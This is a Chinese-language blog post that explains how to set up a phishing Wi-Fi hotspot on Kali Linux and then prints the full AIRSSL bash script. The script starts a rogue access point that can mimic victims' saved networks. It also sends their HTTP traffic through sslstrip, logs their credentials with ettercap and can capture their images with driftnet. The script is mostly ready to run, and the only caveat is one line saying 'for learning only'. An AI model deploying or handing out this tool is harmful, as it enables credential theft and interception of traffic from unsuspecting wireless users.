興奮了一個中午,今天中午吃飯前終于把釣魚ap搭建好了,原來一直出現各種各樣的問題,逐個解決,現在把搭建方法及出現的問題寫下。
要搭建釣魚Wifi很簡單,必備的6個東西:
1、無線網卡,這裡我用的是拓石N87網卡
2、KaliLinux作業系統,這裡就不用說了,必備的
3、isc-dhcp-server伺服器。安裝好KaliLinux後隻需要apt-get update 然後apt-get install isc-dhcp-server即可
4、Aircrack-ng套件 #用來發送資料
5、sslstrip 用來突破SSL加密
6、ettercap 用來嗅探劫持
後面三個軟體KaliLinux都自帶有,不用安裝即可。
首先強調下,後面的bash腳本适用于使用isc-dhcp-server這個bash腳本,建立釣魚熱點。
安裝dhcp服務
apt-get install isc-dhcp-server
配置檔案分别在/etc/default/isc-dhcp-server和/etc/dhcp/dhcpd.conf,前者可以配置監聽端口,這裡以wlan0為例
配置dhcp檔案後,斷開wlan0的網絡,配置設定一個ip
ifconfig wlan0 192.168.1.2/24
啟動dhcp服務
/etc/init.d/isc-dhcp-server start 或者
service isc-dhcp-server start
建立熱點:
将下文寫好的airssl.sh添加執行權限
bash airssl.sh
然後分别是AP建立,DHCP建立,sslstrip開啟,ettercap開啟。
代碼如下:
#!/bin/bash
# 修改版,原版資訊如下:
########################################################
# ©opyright 2009 - killadaninja - Modified G60Jon 2010
# airssl.sh - v1.0
# visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh
########################################################
# Network questions
echo "AIRSSL_KALI"
echo "修該版本,适用于kali或者使用isc-dhcp-server的環境,原版資訊如下:"
echo "AIRSSL 2.0 - Credits killadaninja & G60Jon "
echo "僅供學習用途"
echo
route -n -A inet | grep UG
echo "DNS伺服器.例如8.8.8.8: "
read -e dnsip
echo "網關位址.例如192.168.0.1:"
read -e gatewayip
echo "接入internet的接口.例如eth1: "
read -e internet_interface
echo "用于建立AP的接口.例如wlan0: "
read -e fakeap_interface
echo "AP的ESSID: "
read -e ESSID
airmon-ng start $fakeap_interface
fakeap=$fakeap_interface
fakeap_inter
# Dhcpd creation
mkdir -p "/pentest/wireless/airssl"
cp /etc/dhcp/dhcpd.conf /etc/dhcp/dhcpd.conf.bak
cp /etc/default/isc-dhcp-server /etc/default/isc-dhcp-server.bak
echo "ddns-update-style none;
default-lease-time 600;
max-lease-time 7200;
authoritative;
log-facility local7;
">/etc/dhcp/dhcpd.conf
echo -n "subnet 192.168.0.0 netmask 255.255.255.0 {
range 192.168.0.100 192.168.0.200;
option domain-name-servers ">>/etc/dhcp/dhcpd.conf
echo -n $dnsip>>/etc/dhcp/dhcpd.conf
echo -n ";
# option domain-name "internal.example.org";
option routers ">>/etc/dhcp/dhcpd.conf
echo -n $gatewayip>>/etc/dhcp/dhcpd.conf
echo -n ";
option broadcast-address 192.168.0.255;
default-lease-time 600;
max-lease-time 7200;
}" >> /etc/dhcp/dhcpd.conf
echo "
DHCPD_CONF=/etc/dhcp/dhcpd.conf
DHCPD_PID=/var/run/dhcpd.pid
INTERFACES="at0"
">/etc/default/isc-dhcp-server
# Fake ap setup
echo "[+] Configuring FakeAP...."
echo
echo "Airbase-ng will run in its most basic mode, would you like to
configure any extra switches? "
echo
echo "Choose Y to see airbase-ng help and add switches. "
echo "Choose N to run airbase-ng in basic mode with your choosen ESSID. "
echo "Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and slave will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY. "
echo "Y, N or A "
read ANSWER
if [ $ANSWER = "y" ] ; then
airbase-ng --help
fi
if [ $ANSWER = "y" ] ; then
echo
echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be
redefined, also in this mode you MUST define a channel "
read -e aswitch
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi
if [ $ANSWER = "a" ] ; then
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
sleep 2
fi
if [ $ANSWER = "n" ] ; then
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi
# Tables
echo "[+] Configuring forwarding tables..."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig at0 $gatewayip netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 192.168.0.0 netmask 255.255.255.0 gw $gatewayip
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
# DHCP
echo "[+] Setting up DHCP..."
#touch /var/run/dhcpd.pid
#chown dhcpd:dhcpd /var/run/dhcpd.pid
#xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" at0 & dchpid=$!
#sleep 3
/etc/init.d/isc-dhcp-server start
# Sslstrip
echo "[+] Starting sslstrip..."
xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 2
# Ettercap
echo "[+] Configuring ettercap..."
echo
echo "Ettercap will run in its most basic mode, would you like to
configure any extra switches for example to load plugins or filters,
(advanced users only), if you are unsure choose N "
echo "Y or N "
read ETTER
if [ $ETTER = "y" ] ; then
ettercap --help
fi
if [ $ETTER = "y" ] ; then
echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
For the sake of airssl, ettercap WILL USE -u and -p so you are advised
NOT to use -M, also -i is already set and CANNOT be redifined here.
Ettercaps output will be saved to /pentest/wireless/airssl/passwords
DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
echo
read "eswitch"
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
sleep 1
fi
if [ $ETTER = "n" ] ; then
echo
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
sleep 1
fi
# Driftnet
echo
echo "[+] Driftnet?"
echo
echo "Would you also like to start driftnet to capture the victims images,
(this may make the network a little slower), "
echo "Y or N "
read DRIFT
if [ $DRIFT = "y" ] ; then
mkdir -p "/pentest/wireless/airssl/driftnetdata"
echo "[+] Starting driftnet..."
driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
sleep 3
fi
xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!
clear
echo
echo "[+] Activated..."
echo "Airssl is now running, after slave connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
echo
echo "[+] IMPORTANT..."
echo "使用完畢請鍵入Y恢複系統配置,否則可能會出現問題!"
read WISH
# Clean up
if [ $WISH = "y" ] ; then
echo
echo "[+] Cleaning up airssl and resetting iptables..."
kill ${fakeapid}
kill ${dchpid}
kill ${sslstripid}
kill ${ettercapid}
kill ${dritnetid}
kill ${sslstriplogid}
airmon-ng stop $fakeap_interface
airmon-ng stop $fakeap
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
mv /etc/default/isc-dhcp-server.bak /etc/default/isc-dhcp-server
mv /etc/dhcp/dhcpd.conf.bak /etc/dhcp/dhcpd.conf
/etc/init.d/isc-dhcp-server stop
echo "[+] Clean up successful..."
echo "[+] Thank you for using airssl, Good Bye..."
exit
fi
exit
做這個最重要的還是寫shell腳本
後面的腳本如果都能自己寫出來,才是真正的大神。本人菜鳥,歡迎各位大神狂噴
![linux-svn解除安裝與安裝[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)